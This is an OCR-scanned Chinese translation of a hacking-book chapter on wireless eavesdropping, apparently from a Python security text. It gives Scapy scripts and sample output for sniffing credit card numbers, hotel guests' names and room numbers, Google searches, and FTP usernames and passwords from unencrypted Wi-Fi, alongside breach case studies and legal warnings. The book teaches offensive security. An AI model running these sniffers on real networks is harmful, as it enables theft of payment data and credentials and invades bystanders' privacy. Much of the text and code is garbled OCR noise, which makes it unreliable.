洲 水 就 可 以 。 知 识 是 随 着 时 间 、 工 作 和 勤奋 而 来 的 。 除 此 以 外 ， 别 无 他 法 。 


一 一 Ed Parker， 美 式 空手 道 大 师 


SIS: 无 线 网 络 的 (不 ) 安全 性 和 冰 人 


2007 年 9 月 5 日 ,美国 联邦 特勤 局 (the US Secret Service) 逮捕 了 一 名 叫 麦 克 
斯 。 雷 。 布 鲁 特 的 无 线 黑客 (Secret Service, 2007) 。 这 位 被 称 为 “ 冰 人 ”的 布 鲁 特 先 生 通 过 
网 络 销售 了 数 以 万 计 的 信用 卡 账 户 信 息 。 但 他 是 怎样 收集 到 这 些 个 人 信息 的 ? 经 过 调查 发 
现 ， 未 经 加 密 的 无 线 网 络 链接 是 他 获取 信息 的 途径 之 一 。 这 位 “ 冰 人 ”运用 虚假 的 身份 信息 
在 宾馆 /公寓 里 租 了 房间 ， 随 后 ， 使 用 大 功率 的 天 线 截 取 宾 馆 和 公寓 附近 的 无 线 热点 上 的 通信 
流量 ， 以 获取 其 他 住 客 的 个 人 信息 (Peretti, 2009) 。 媒 体 通常 称 这 种 攻击 行为 是 “厉害 而 复 
杂 的 ”， 而 我 们 只 需 几 个 简短 的 Python 脚本 即 可 完成 这 种 极 富 危险 性 的 攻击 行为 。 在 接 下 来 
的 章节 中 ， 你 可 以 看 到 : 只 需 不 超过 25 行 代 码 就 能 帘 探 到 他 人 的 信用 卡 信息 。 但 在 开始 之 
前 ， 请 确保 你 已 经 正确 搭建 了 我 们 所 要 求 的 环境 。 
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搭建 无 线 网 络 攻击 环境 


在 下 面 的 内 容 中 ， 我 们 会 编写 一 些 代码 来 嗅 探 无 线 通信 流量 和 发 送 数据 链 路 层 上 的 
802.11 帧 ' 。 在 本 章 中 所 有 编写 和 测试 脚本 的 工作 都 是 在 一 块 带 有 Range Amplifier 
(HAWNU1) 的 Hawking Hi-Gain USB150N 无 线 网 卡 上 完成 的 。Backtrack 5 操作 系统 上 的 默 
认 驱 动 程序 能 让 用 户 把 网 卡 设 为 混杂 模式 (monitor mode) ， 并 直接 发 送 数 据 链 路 层 上 的 帧 。 
另外 ， 它 还 有 一 个 额外 的 无 线 插口 ， 让 我 们 能 在 网 卡 上 再 插 上 一 个 大 功率 天 线 。 

我 们 的 脚本 需要 把 网 卡 设 为 混杂 模式 ， 以 被 动 侦 听 所 有 的 无 线 网 络 流量 。 混 杂 模 式 允 许 
你 直接 拿 到 数据 链 路 层 上 的 无 线 网 络 数 据 帧 ， 而 不 是 以 管理 模式 进入 后 获得 的 802.11 以 太 网 
数据 帧 。 这 样 ， 即 使 是 在 没有 连 上 某 个 网 络 的 情况 下 ， 你 也 能 看 到 Beacons UŽE) 数据 帧 和 
无 线 网 络 管理 数据 帧 的 数据 。 


用 Scapy 测 试 无 线 网 卡 的 噢 探 功能 


我 们 使 用 Thomas d’Otreppe 编写 的 aircrack-ng ”工具 包 把 网 卡 设 为 混杂 模式 。 先 用 
Iwconfig 列 出 无 线 网 卡 wlan0 的 相关 信息 。 然 后 用 “airmon-ng start wlan0” 命 令 把 网 卡 设 为 混 
杂 模 式 ， 这 样 就 创建 了 一 个 名 为 “mon0” 的 新 网 卡 。 

attacker# iwconfig wlan0 

wlan0 IEEE 802.11bgn ESSID:off/any — 
Mode:Managed Access Point: Not-Associated | 
Retry long limit:7 RTS thr:off Fragment thr:off 
Encryption key:off | 


Power Management:on © | 
ed eile tae peed start vlan0 


Interface sta il NP 
外 wlan0 A Ralink RT2870/3070 rt2800usb = tphy0} 
Cn Edy ace ana on moid) 


在 把 网 卡 设 为 混杂 模式 之 后 ， 我 们 快速 测试 一 下 是 否 真 能 截获 无 线 网 络 中 的 流量 。 注 


1 802.11: 802.11 协议 簇 是 国际 电工 电子 工程 学 会 ‘IEEE) 为 无 线 局 域 网 络 制定 的 标准 。 一 一 译 者 注 
2 aircrack-ng 是 一 款 用 于 破解 无 线 802.11WEP 和 WPA-PSK 加 密 的 工具 ， 该 工具 在 2005 年 11 月 之 前 的 
名 字 是 aircrack， 在 其 2.41 版 本 之 后 才 改 名 为 aircrack-ng。 一 一 译 者 注 
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意 ， 我 们 要 把 变量 “conf'iface” 的 值 设 为 新 创建 的 嗅 探 用 网 卡 一 mon0。 每 侦 听 到 一 个 数据 
包 ， 脚 本 就 会 运行 pktPrintO0 函 数 。 如 果 这 个 数据 包 是 802.11 信 标 ，802.11 探查 (Probe) 响 
bi, TCP 数据 包 、DNS 流量 ， 那 么 该 函数 就 会 输出 一 条 相应 的 信息 。 











运行 脚本 后 ， 我 们 看 到 有 了 一 些 流量 。 注 意 ， 这 些 流量 里 包含 寻找 网 络 的 802.11 探查 请 
求 、 指 引流 量 的 802.11 信 标 帧 ， 以 及 DNS 和 TCP 数据 包 。 这 样 ， 我 们 就 知道 网 卡 工 作 正 
常 。 





安装 Python 蓝牙 包 


在 本 章 中 ， 我 们 会 介绍 有 关 蓝 牙 攻击 的 一 些 内 容 。 在 编写 Python 蓝牙 脚本 时 ， 我 们 还 要 


3 探查 请 求 : 通过 MAC 分 离 方法 ，AP 只 处 理 有 实时 要 求 的 协议 部 分 ， 如 信 标 帧 的 发 送 、 响 应 来 自 客户 
端的 “探查 请 求 (Probe Requests)” 帧 、 为 交换 机 或 控制 器 提供 实时 信号 质量 信息 、 监 视 其 他 AP 的 
出 现 以 及 第 二 层 加 密 等 。 一 一 译 者 注 
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使 用 Python 中 集成 的 Linux Bluez 应 用 程序 编程 接口 (API) 以 及 obexftp” API， 在 Backtrack 
5 系统 上 可 以 使 用 apt-get 来 安装 这 些 包 。 






DAB) ， ii | J ots oia 1 】 Sie) a \ H, EF iis ip i iiss GO eh EuS voj 
at i, f NES vt) eae ie a | 图 | ee IUR T Us TERIN =) yh 二 二 3 LE Pe i $i 1 ats eerie ope 4) ` l i 
Bey = yen a DU a AL thiol AE 、 |S t bye 
“i r 4 4 hy |e 
~ $ 一 > 
Se <a call i, 


另外 ， 你 还 需要 有 一 个 蓝牙 设备 。 大 部 分 使 用 Cambridge Silicon Radio (CSR) 公司 出 品 
的 芯片 组 的 〈 蓝 牙 设 备 ) 都 能 在 Linux 操作 系统 下 正常 工作 。 在 本 章 所 涉及 的 脚本 中 ， 我 们 
使 用 的 是 SENA Parani UD100 USB 蓝牙 适配器 。 要 测试 操作 系统 能 否 识别 这 个 设备 ， 请 运行 
“hciconfig confg” 命 令 ， 它 会 把 蓝牙 设备 的 详细 配置 信息 打印 在 屏幕 上 。 






下 面 我 们 会 截取 和 伪造 蓝牙 数据 帧 。 在 后 面 ， 我 们 还 会 再 次 提 到 这 一 点 ， 但 有 一 点 非常 
重要 ， 那 就 是 : Backtrack5 rl 上 有 一 个 小 瑕 疫 一 一 在 这 个 已 经 编译 好 的 内 核 中 ， 没 有 可 以 用 来 
直接 发 送 数据 链 路 层 上 的 蓝牙 数据 包 的 内 核 模 块 。 所 以 ， 需 要 升级 你 的 操作 系统 内 核 或 者 使 
用 Backtrack 5 r2. 

接 下 来 的 部 分 非常 激动 人 心 。 我 们 将 要 去 嗅 探 信用 卡 信 息 、 用 户 登录 口令 、 远 程 接管 一 
架 无 人 机 、 找 出 无 线 网 络 中 的 黑客 、 探 测 和 利用 蓝牙 设备 中 的 漏洞 。 请 确保 这 样 主动 或 者 被 
动 的 监视 无 线 网 络 和 蓝牙 传输 不 触犯 〈 您 所 在 地 的 ) 相关 法 律 和 法 规 。 


4 


4 ObexFTP 是 一 个 基于 OBEX 协议 的 FTP 客户 端 软件 。OBEX 的 全 称 为 Object Exchange (HAX 
换 )， 所 以 称 之 为 对 象 交 换 协 议 。 它 在 此 软件 中 占有 核心 地 位 ， 文 件 传输 和 IrMC 同步 都 会 使 用 到 它 。 
一 一 译 者 注 
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绵羊 墙 一 一 被 动 穷 听 无 线 网 络 中 传输 的 秘密 


自 2001 年 以 来 ， 绵 羊 墙 小 组 每 年 都 会 在 DEFCON 安全 大 会 上 现 身 ， 这 个 小 组 会 被 动 地 
监听 用 户 通过 未 经 保护 或 加 密 的 方式 ， 登 录 电 子 邮件 服务 器 、Web 站 点 或 其 他 网 络 服务 器 的 
流量 。 如 果 发 现 了 用 户 名 /密码 对 ， 他 们 就 会 把 它 显示 到 大 赛会 场 墙 上 的 大 屏幕 上 。 近 年 来 ， 
这 些 人 还 增加 了 一 个 叫 “ 躲 猫 猫 ”的 设计 ， 该 设计 可 以 帮助 他 们 根据 无 线 网 络 流 量 刻画 出 他 
们 想 要 的 信息 。 尽 管 其 出 发 点 是 善意 的 ， 但 这 个 团队 很 好 地 向 我 们 展示 了 黑客 是 如 何 截取 类 
似 信息 的 。 在 接 下 来 的 几 节 中 ， 我 们 将 重 现 几 次 从 空中 窃取 我 们 感 兴趣 的 信息 的 攻击 。 





使 用 Python 正则 表达 式 嗅 探 信用 卡 信息 


在 嗅 探 无 线 网 络 中 的 信用 卡 信 息 之 前 ， 先 简单 复习 一 下 “正则 表达 式 ” (regular 
expression) 还 是 很 有 必要 的 ，“ 正 则 表达 式 ” 是 一 种 文本 中 寻找 给 定 字符 串 的 方法 。 在 
Python 中 正则 表达 式 是 作为 re (regular expression) “ 库 的 一 部 分 提供 的 。 下 面 是 一 些 明确 定义 
好 的 正则 表达 式 。 


匹配 任意 一 个 字符 ， 换 行 符 除 外 
[ab] 匹配 字符 a 或 b 


[0-9] 匹配 0~9 之 间 任 意 一 个 数字 

匹配 字符 串 的 开头 

. 使 正则 表达 式 中 匹配 前 一 个 正则 表达 式 的 0 次 或 多 次 重复 
+ 使 正则 表达 式 中 匹配 1 次 或 多 次 重复 

? 使 正则 表达 式 中 匹配 前 一 个 正则 表达 式 的 0 次 或 1 次 重复 
{n} 精确 地 匹配 前 一 个 正则 表达 式 的 n 次 重复 


攻击 者 可 以 使 用 正则 表达 式 来 寻找 类 似 信用 卡号 的 字符 串 。 由 于 脚本 设计 较为 简单 ， 我 
们 会 尝试 搜 找 最 常用 的 三 种 信用 卡 : Visa、MasterCard 和 American Express。 如 果 你 想 了 解 更 


5 The Wall of Sheep 源 自 黑客 大 会 的 鼻祖 Defcon. The Wall of Sheep 也 就 是 The Wall of Shame 的 意 
思 ， 用 来 教育 人 们 “你 很 可 能 随时 都 被 监视 *， 同 时 也 给 那些 参 会 的 人 难堪 ， 参 加 安全 大 会 还 如 此 不 注 
意 安全 ， 难 怪 被 贴 到 绵羊 墙 上 。 现 在 绵羊 的 账号 和 部 分 隐匿 的 密码 将 被 投影 在 专门 的 一 个 会 议 室内 的 
投影 幕 上 ， 目 前 的 The Wall of Sheep 大 约 由 七 名 来 自 北 美的 安全 人 士 维护 ， 他 们 每 年 花 两 周 时 间 来 拉 斯 
维 加 斯 参加 Defcon 安全 大 会 。 相 关 阅 读 见 : http://www.2cto.com/News/200808/28861.html。 一 一 译 者 注 

6 这 个 库 就 是 re 模块 ， 详 见 http://www.cnblogs.com/huxi/archive/2010/07/04/1771073.html。 一 一 译 者 注 
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多 关于 编写 寻找 信用 卡号 的 正则 表达 式 的 知识 ， 请 登录 http://www.regular-expressions.info/ 
creditcard.html， 其 中 会 提供 其 他 银行 的 信用 卡 卡号 的 正则 表达 式 。American Express 信用 卡 由 
34 或 者 37 开头 的 15 位 数字 组 成 。 让 我 们 来 写 一 个 小 函数 检查 一 个 字符 串 ， 看 其 中 是 否 含有 
American Express 信用 卡 卡 号 ， 如 果 有 ， 就 把 这 一 信息 显示 在 屏幕 上 。 请 注意 下 面 这 个 正则 表 
达 式 ， 它 确保 信用 卡 卡号 是 以 3 开头 的 ， 第 二 个 字符 应 该 是 4 或 者 7。 接 下 来 ， 正 则 表达 式 还 
需 验 证 后 面 有 13 位 的 数字 ， 以 确保 它 是 长 度 为 15 位 的 一 个 数字 。 


import re 
def findCreditCard (raw) : 
americaRE= re. findall ("3[47] [0- 9] {13}", raw) 
if americaRE: 
print "[+] Found, American Express Card: "+americaRE[0] 
def main(): 
tests = [J 
tests.append('I would like to buy 1337 copies of that dvd') -~ 
tests.append('Bill my card: 378282246310005 for \$2600') 
Sfor Test iin Teats: iii i 
: findCreditCard (test) 


7 i 
+ 


LE _. ae Seen Py 
main () 


运行 测试 样 例 程序 ， 我 们 可 以 看 到 它 准确 地 找 出 了 第 2 个 测试 项 目 ， 并 将 信用 卡 卡号 显 
示 了 出 来 。 


‘attachers python americanExpressTest.py 
[+] Found American Express Card: 378282246310005 


现在 ， 我 们 来 写 寻找 MasterCards 和 Visa 信用 卡 卡号 的 正则 表达 式 。MasterCards 的 开头 
可 能 是 51~55 之 间 的 任意 数字 ， 卡 号 共 16 位 。Visa 卡 的 开头 数字 是 4， 长 度 是 13 或 16 位 。 
让 我 们 给 “findCreditCard0 ”函数 加 点 代码 ， 让 它 也 能 找 出 MasterCards 和 Visa 信用 卡 卡 
号 。 注 意 ，MasterCards 信用 卡 卡号 的 正则 表达 式 匹 配 的 是 数字 5， 后 接 1~5 之 间 的 任 一 数 
字 ， 再 后 接 14 位 数字 ， 总 长 度 为 16 位 。Visa 卡 的 正则 表达 式 寻 找 的 是 : 以 4 开头 ， 后 接 12 
位 数字 ， 在 这 之 后 可 以 有 0 组 或 1 组 3 位 数字 ， 以 保证 它 是 总 长 度 为 13 位 或 16 位 的 数字 。 
def findCreditCard (pkt): 
raw = pkt.sprintf('%Raw.load$') _ 
americaRE = re.findall('3{47][0-9]{13}',; raw) 
masterRE = re.findall('5{1-5] [0-9]{14}', raw) | 


visaRE = re.findall('4[0-9] {12} (?:[0-9]{3})?", raw) 
if americaRE: 
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现在 ， 我 们 要 用 这 些 正 则 表达 式 去 匹配 嗅 探 到 的 无 线 数据 包 。 请 记 住 ， 要 想 嗅 探 到 数 
据 ， 就 得 用 混杂 模式 ， 因 为 它 能 让 我 们 观察 到 所 有 的 数据 帧 ， 无 论 帧 的 目标 地 址 是 不 是 我 们 
这 人 台 机 器 。 为 了 解析 从 我 们 的 无 线 网 卡 上 抓 取 到 的 数据 包 ， 应 使 用 Scapy 库 。 注 意 sniffO 函 
数 的 用 法 ，sniff0) 会 把 抓 到 的 每 个 TCP 包 作 为 一 个 参数 传递 给 findCreditCard(0 函 数 。 只 用 了 区 
区 25 行 的 Python 代码 ， 我 们 就 写 出 了 一 个 可 以 窃取 信用 卡 信息 的 小 程序 。 
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显然 ， 我 们 并 不 是 要 你 去 盗 禄 信用 卡 信息 。 事 实 上 ， 已 经 有 一 名 叫 阿 尔 伯 特 . 冈 萨 雷 斯 黑 
客 ， 因 实施 与 之 非常 类 似 的 攻击 ， 而 被 判处 20 年 以 上 监禁 。 我 们 只 是 想 让 你 意识 到 这 类 攻击 
其 实 是 相对 很 容易 的 ， 并 不 像 一 般 人 想象 的 那么 复杂 。 在 下 一 节 中 ， 我 们 将 在 一 个 独立 的 场 
景 里 “作战 ”一 一 攻击 未 加 密 的 无 线 网 络 ， 从 中 资 取 个 人 信息 。 


案例 解析 


影子 帮 有 的 终结 

2008 年 9 月 ， 美 国 马赛 诸 塞 州 地 方 检察 院 指控 阿尔 伯 特 ， 冈 萨 雷 斯 犯 有 电信 诈骗 
罪 、 破 坏 电 脑 系统 罪 、 破 坏 信息 系统 罪 以 及 盗窃 罪 的 加 重 情节 ( Heymann，2008 )。 阿 
尔 伯 特 . 冈 萨 雷 斯 (也 称 为 soupnazi ) 使 用 了 一 个 无 线 探测 器 进入 TIX 公司 的 系统 。 
当时 ，TJX 公司 使 用 的 是 有 缺陷 且 不 很 安全 的 WEP 加 密 算法 对 流量 进行 加 密 。 这 一 政 
忽 令 冈 萨 雷 斯 的 “影子 帮 ” 能 抓 取 到 无 线 网 络 中 的 流量 ， 并 进行 解密 。 他 们 使 用 无 线 


嗅 探 技术 ， 再 加 上 一 些 其 他 技术 ， 获 得 了 超过 457 千 万 用 户 的 信用 卡 信息 ,， 其 中 包括 
BJ Wholesale. DSW, Office Max, Boston Market, Barnes 和 Noble, Sports Authority 
fe TJ Maxx 等 信用 卡 类 型 。 

一 名 身高 七 尺 的 黑客 老手 史 荫 芬 . 沃 特 也 参与 了 “影子 帮 ” 的 行动 。 当 时 ， 沃 特 
正在 实时 交易 软件 的 编写 领域 新 露头 角 (Zetter, 2009 )。 由 于 他 在 编写 无 线 嗅 探 器 的 过 
程 中 所 扮演 的 角色 ， 联 邦 州 判 处 他 两 年 有 期 徒刑 ， 并 赔偿 TIX 公司 1.715 亿美 元 的 损 
失 。 





IRR EES 


现在 大 部 分 酒店 都 会 提供 公共 的 无 线 网 络 。 通 常情 况 下 ， 这 些 网 络 并 不 会 对 流量 进行 加 
密 ， 也 不 会 有 什么 企业 级 的 认证 和 加 密 控 制 。 本 节 在 这 一 场景 中 倒 腾 ， 只 用 很 少 几 行 Python 
代码 就 能 利用 这 一 情形 下 的 问题 引发 灾难 性 的 公共 信息 泄露 事件 。 

最 近 ， 我 住 过 一 家 提供 无 线 网 络 的 宾馆 ， 连 上 网 络 之 后 ， 我 的 浏览 器 跳出 一 个 要 我 登录 
的 界面 ， 登 录 时 需要 填写 我 的 “ 姓 ” 和 “房间 号 ”。 提 交 这 些 信息 之 后 ， 浏 览 器 把 它 提交 到 
服务 器 上 一 个 未 加 密 的 HTTP 页 面 ， 以 接收 授权 cookie。 看 了 最 先 发 送 的 HTTP post 请 求 之 
后 发 现 了 一 些 有 意思 的 信息 ， 我 注意 到 其 中 有 一 个 类 似 “PROVIDED LAST _NAME= 
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OCONNOR&PROVIDED ROOM _ NUMBER=1337” 的 字符 串 。 

这 段 传 给 服务 器 的 明文 文本 中 包含 了 我 的 姓 和 宾馆 房间 号 ， 而 服务 商 并 未 意识 到 这 些 信 
息 应 该 受到 保护 ， 我 的 浏览 器 就 这 么 把 这 些 信息 以 明文 形式 发 送 了 出 去 。 在 这 家 宾馆 里 ， 住 
客 的 姓 和 房间 号 是 在 宾馆 内 吃 牛 排 晚餐 、 接 收 消费 信息 ， 甚 至 是 在 礼品 店 买 东西 的 凭证 。 所 
以 ， 你 可 以 想象 一 一 那 家 宾馆 的 住 客 肯 定 不 想 让 这 些 个 人 信息 落 入 黑客 之 手 。 







现在 ， 我 们 可 以 使 用 Python 来 截取 酒店 里 其 他 住 客 的 信息 。 在 Python 中 ， 启 动 一 个 无 线 
网 络 嗅 探 器 是 相当 方便 的 。 首 先 ， 我 们 要 把 用 来 嗅 探 的 网 卡 定义 在 脚本 中 。 接 下 来 ， 嗅 探 器 
会 使 用 snifft0 函 数 监听 流量 一 一 注意 ， 这 个 函数 只 留 下 TCP 流量 ， 并 把 所 有 的 包 转 发 给 一 个 
名 为 findGuest() 的 函数 。 


当 函 数 findGuest() 接 收 到 数据 包 之 后 ， 它 会 确定 抓 到 的 数据 包 里 是 否 含有 个 人 信息 。 首 
先 ， 它 会 把 载荷 中 的 二 进 制 内 容 复 制 到 一 个 名 为 raw 的 变量 中 。 接 下 来 ， 我 们 构造 一 个 正则 
表达 式 去 解析 住 客 的 “ 姓 ” 和 “房间 号 ”。 注 意 ， 我 们 将 寻找 “ 姓 ” 的 正则 表达 式 匹 配 所 有 
以 “LAST NAME” 开 头 ， 并 以 “有 ”结尾 的 字符 串 ， 寻 找 宾馆 住 客房 间 号 的 正则 表达 式 则 匹 
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把 所 有 这 些 放 在 一 起 ， 现 在 就 有 了 一 个 能 抓 取 任 何 连 入 无 线 网 络 的 宾馆 住 客 的 姓 和 宾馆 
房间 号 的 无 线 宾 馆 住 客 信息 嗅 探 器 。 请 注意 ， 我 们 必须 导入 Scapy 库 ， 才 能 在 嗅 探 到 流量 之 
后 把 它 解析 出 来 。 


运行 我 们 的 宾馆 嗅 探 程序 ， 我 们 就 能 明白 黑客 是 怎样 识别 出 一 些 住 在 宾馆 里 的 住 客 的 。 
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attacker# python hotelSniff.py -i wlan0 
[*] Starting Hotel Guest Sniffer. 
[+] Found Hotel Guest MOORE, Room #1337 
[+] Found Hotel Guest VASKOVICH, Room #1984 
[+] Found Hotel Guest BAGGETT, Room #43434343 


现在 ， 我 不 得 不 再 次 强调 ， 收 集 这 些 个 人 信息 可 能 触犯 州 、 联 邦和 国家 的 法 律 。 在 下 一 
节 中 ， 我 们 会 解析 无 线 网 络 中 的 谷歌 搜索 请 求 ， 拓 展 我 们 的 无 线 网 络 嗅 探 器 的 能 力 。 


编写 谷歌 键盘 记录 器 


你 应 该 已 经 注意 到 ， 当 你 在 谷歌 搜索 栏 中 输入 需要 的 信息 时 ， 谷 歌 搜索 引擎 几乎 是 实时 
地 给 你 回馈 。 若 网 速 给 力 ， 在 搜索 栏 里 每 输入 一 个 字符 时 ， 浏 览 器 几乎 都 会 同 谷歌 发 送 一 
HTTP GET。 看 一 下 执行 下 面 这 个 操作 时 ， 发 送 给 谷歌 的 HTTP GET 请 求 : 现在 我 搜索 字符 
$ “what is the meaning of life?”。 出 于 个 人 偏好 ， 我 去 除了 URL 中 许多 附加 的 高 级 搜索 参 
数 ， 但 请 注意 ， 搜 索 是 由 “q=” 开 始 ， 后 面 接 要 搜索 的 字符 串 ， 并 以 “有 ”终止 ， 字 符 
“pq=” 后 接 的 是 上 一 个 搜索 的 内 容 。 

GET 

/s?hl=en&cp=27&gs_id=58&xhr=t&q=what%20is%20the%20meaning%200£%20 

life&pq=the+number+42&<. .上 略 . .> HTTP/1. 1 \ 

Host: www.google.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 7 2) 


AppleWebKit/534.51.22 (KHTML, like porsa Version/5. PA 
Safari/534.51.22 


小 提示 和 工具 


谷歌 URL 中 的 搜索 参数 
谷歌 搜索 的 URL 中 的 参数 提供 了 大 量 附 加 信息 ， 这 些 信息 对 编写 谷歌 键盘 记录 器 


是 相当 有 用 的 。 通 过 解析 查询 的 关键 字 以 及 上 一 个 关键 字 、 语 言 、 精 确 搜 索 、 要 搜索 
的 文件 类 型 和 网 站 都 可 以 为 我 们 的 键盘 记录 器 增加 额外 的 价值 。 请 访问 
http://www.google.com/cse/docs/resultsxml.html 的 谷歌 文档 来 获取 更 多 关于 谷歌 URL 中 
搜索 参数 的 信息 。 
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和 查询 的 内 容 ， 就 是 在 搜索 框 里 输入 的 内 容 

pq= 上 一 次 查询 的 内 容 ， 即 本 次 搜索 前 一 次 的 查询 内 容 

hl= a Ridden 〈 英 文 ) ， 若 有 兴趣 ， 可 以 试 试 xx-hacker 
as_epq= 查询 的 精度 

as_filetype= 文件 格式 ， 用 于 搜索 特定 类 型 的 文件 ， 如 .zip。 
as_sitesearch= 指定 要 搜索 的 网 站 ， 比 如 www.2600.com 


了 解 谷歌 URL 中 参数 的 意义 之 后 ， 我 们 来 快速 编写 一 个 无 线 网 络 数据 包 嗅 探 器 ， 并 把 抓 
取 到 的 搜索 数据 实时 地 显示 出 来 。 这 一 次 我 们 用 一 个 名 为 findGoogle() 的 函数 来 处 理 抓 到 的 数 
据 包 。 在 这 个 函数 中 ， 我 们 将 数据 包 中 的 数据 内 容 复制 到 一 个 名 为 “payload” 的 变量 中 。 如 
果 payload 中 含有 HTTP GET 请 求 ， 我 们 就 会 构造 一 个 正则 表达 式 去 寻找 谷歌 当前 要 搜索 的 
字符 串 。 最 后 ， 清 除 结果 字符 串 ”"。HTTP URL 中 是 不 可 以 有 空格 的 。 为 了 避免 这 一 问题 ， 
Web 浏览 器 会 把 空格 编码 成 “+” 或 者 “%20”。 为 了 正确 地 把 消息 转换 出 来 ， 我 们 必须 再 把 
“+” 或 者 “%20” 转 成 空格 。 


i ne A m Ay (aaa wir Ris: J "TUL = k ul U iy’ ev a kK = Ham 
Wes rat 下 ENN eit ae R h A Mew bey Th CEMIS AT 。 山 
nl UES TOK EA hee NOAWOOdDd LS OKT) Tele aT | " Jip wa 7 ‘ i i 
Oy Se ee A has -an ALU = { ir Nn eae aT F i 

he i. } 0 一 mw T An A 『 . 
` ETa bra 7 mJ žilė i LA -~ DM en ms. 4 y A e g , y M Ąą" 
y ores Pre AY 5 = ee i $012 






把 整个 谷歌 嗅 探 器 脚本 拼 在 一 起 ， 我 们 可 以 观察 回放 的 谷歌 搜索 过 程 。 注 意 ， 现 在 我 们 
先 用 sniff() 函 数 过 滤 出 TCP 流量 中 与 80 端口 相关 的 流量 。 尽 管 谷歌 其 实 也 能 在 443 端口 上 发 
送 HTTPS 流量 ,但 由 于 HTTPS 中 的 载荷 是 加 密 的 ， 获 取 它 们 并 没有 什么 用 处 。 所 以 ， 我 们 
只 要 截取 80 端口 上 的 HTTP 流量 就 够 了 。 





7 原文 如 此 ， 不 过 根据 下 文中 的 代码 ， 这 里 显然 应 该 是 把 结果 打印 出 来 。 一 一 译 者 注 
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在 某 个 使 用 未 加 密 的 无 线 网 络 的 范围 内 使 用 这 个 嗅 探 器 ， 我 们 看 到 有 人 搜索 了 “what is 
the meaning of life?”【〔 生 活 的 意义 是 什么 ) 。 这 是 个 不 太 重 要 的 搜索 。 任 何 读 过 《银河 系 漫 
游 指 南 》 的 人 都 知道 数字 42 是 “生活 的 意义 ”的 解释 (Adams，1980) 。 谷 歌 的 搜索 记录 即 
使 被 别人 抓 取 到 ， 好 像 也 不 会 捅 出 什么 娄 子 。 在 下 一 节 中 ， 我 们 会 介绍 资 取 用 户 登录 的 用 户 
名 /口令 的 方法 一 一 这 对 一 个 组 织 的 整体 安全 态势 危害 挺 大 的 。 
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R D AE AT 


谷歌 街景 的 史诗 式 失败 

2010 年 ， 有 人 指控 : 谷歌 街景 采集 车 在 记录 下 街景 的 同时 ， 也 会 抓 取经 由 未 加 密 
的 无 线 网 络 传输 的 数据 包 。 人 谷歌 编写 了 一 个 叫 “gslite” 的 软件 ， 在 一 次 独立 的 软件 审 
计时 发 现 ， 在 开放 的 网 络 中 再 加 上 一 个 数据 包 嗅 探 器 , “gslite” 软 件 确实 会 去 抓 取 数据 


rep 2010 )。 尽 管 记录 的 目的 并 非 出 于 恶意 ,但 这 些 数据 中 确实 是 含有 GPS 位 
置信 息 的 。 此 外 ， 被 记录 下 来 的 数据 中 还 包含 MAC 地 址 和 附近 设备 的 SSID 
a grit 这 让 数据 的 拥有 者 能 把 相当 一 部 分 个 人 信息 与 他 们 的 物理 位 置 直 
接 关 联 起 来 。 美 国 、 法 国 、 和 德国、 印度 等 多 国政 府 都 以 侵犯 隐私 为 由 提起 了 诉讼 。 在 
用 我 们 编写 的 程序 记录 数据 时 ， 我 们 必须 保证 我 们 没有 违反 地 方 、 联 邦 、 国 家 等 关于 
数据 嗅 探 的 法 律 ( 在 本 章 已 经 强调 过 很 多 次 )。 





嗅 探 FTP 登 录 口 令 


文件 传输 协议 “FTP〉 中 没有 使 用 加 密 措施 来 保护 用 户 的 登录 密码 。 黑 客 可 以 轻松 地 在 受 
害 人 通过 未 加 密 的 网 络 登 录 时 ， 截 取 到 他 的 用 户 名 /口令 。 来 看 看 下 面 这 个 tcpdump 运行 的 结 
果 ， 其 中 显示 了 被 抓 取 到 的 用 户 名 /密码 (用 户 名 为 root， 口 令 为 secret) 。FTP 协议 是 在 网 络 
上 以 明文 形式 传输 登录 的 用 户 名 /密码 的 。 


NIYEN N tcpdump -A -i mon0 'tcp port 21' 

MUK ma CUAN Eo fo EA ae E .R.=. |. P.9. | 
or 54:58. 388129 IP 192. 168. 95.128:, 42653. > 192.468 257 she Ea 
Flags [P.], seq 1:17, ack 63, win 14600, length 16 
Bi. 8..@.@.q. ent Ref ee as .USER root 
20:54:58.388933 IP 192.168,95. 128.42653 nA E APA H o: Pia R E ftp: 
Flags [.], Si 112, win 14600, length 0 
a pe HR 
207535003 732327 IP 192. 168. 95.128; 12653. > 192.168. 211. Ls ftp: 
Flags [P.], seq 17:33, ack 112, win 14600, length 16 
机 


为 了 能 抓 取 到 这 些 用 户 名 /密码 对 ， 我 们 先 找 两 个 特定 的 字符 串 ， 一 个 是 “USER”， 它 
后 面 跟 的 是 用 户 名 ， 男 一 个 是 “PASS”， 它 后 面 跟 的 是 口令 。 就 像 我 们 在 tcpdump 中 看 到 的 
那样 ，TCP 数据 包 里 的 data (或 者 在 Scapy 中 称 之 为 load) 字段 中 就 包含 了 这 些 用 户 名 /密码 
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对 。 我 们 来 写 两 个 正则 表达 式 寻 找 这 一 信息 。 同 时 ， 我 们 也 会 把 数据 包 中 的 目的 IP 地 址 提取 
出 来 。 没 有 FTP 服务 器 的 IP 地 址 ， 用 户 名 和 密码 是 没有 意义 的 。 


ts 


把 所 有 这 些 脚本 合 在 一 起 。 我 们 就 可 以 开始 嗅 探 TCP 21 端口 上 的 TCP 流量 。 同 时 ， 我 
们 也 要 在 程序 中 添加 几 行 参数 解析 代码 ， 使 我 们 能 够 指定 用 哪 块 网 卡 进行 嗅 探 。 运 行 这 个 脚 
本 ， 我 们 就 能 够 抓 取 到 FTP 登录 信息 。 这 与 “绵羊 墙 ” 用 的 工具 很 相似 。 
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ry Peles ee cl Ear | 
=f sniff (filter='tcp port 21", prn=ftpSniff) 
zi cept rt re 
exit (ON 
if name == " main ": 
main() 
运行 我 们 的 脚本 ， 我 们 发 现 了 一 个 登录 某 个 FTP 服务 器 的 会 话 ， 并 把 用 来 登录 服务 器 的 
用 户 名 /密码 输出 到 屏幕 上 。 现 在 我 们 用 不 超过 30 行 的 Python 代码 创建 了 一 个 FTP 登录 口令 
咒 探 器 ， 用 户 名 /口令 也 允许 我 们 访问 网 络 。 在 下 一 节 中 ， 我 们 将 使 用 无 线 嗅 探 器 来 检查 用 户 
的 联网 记录 。 
attacker:~# python ftp-sniff.py -i mon0 
[*] Detected FTP Login to 192.168.211.1 
[+] User account: root\r\n | 
[+] Password: secret\r\n 


你 市 着 笔记 本 电脑 去 过 哪里 ?” Python 告诉 你 


几 年 前 ， 那 时 我 任教 过 一 门 关于 无 线 网 络 安全 的 课 。 上 课时 ， 我 会 把 教室 里 正常 的 无 线 
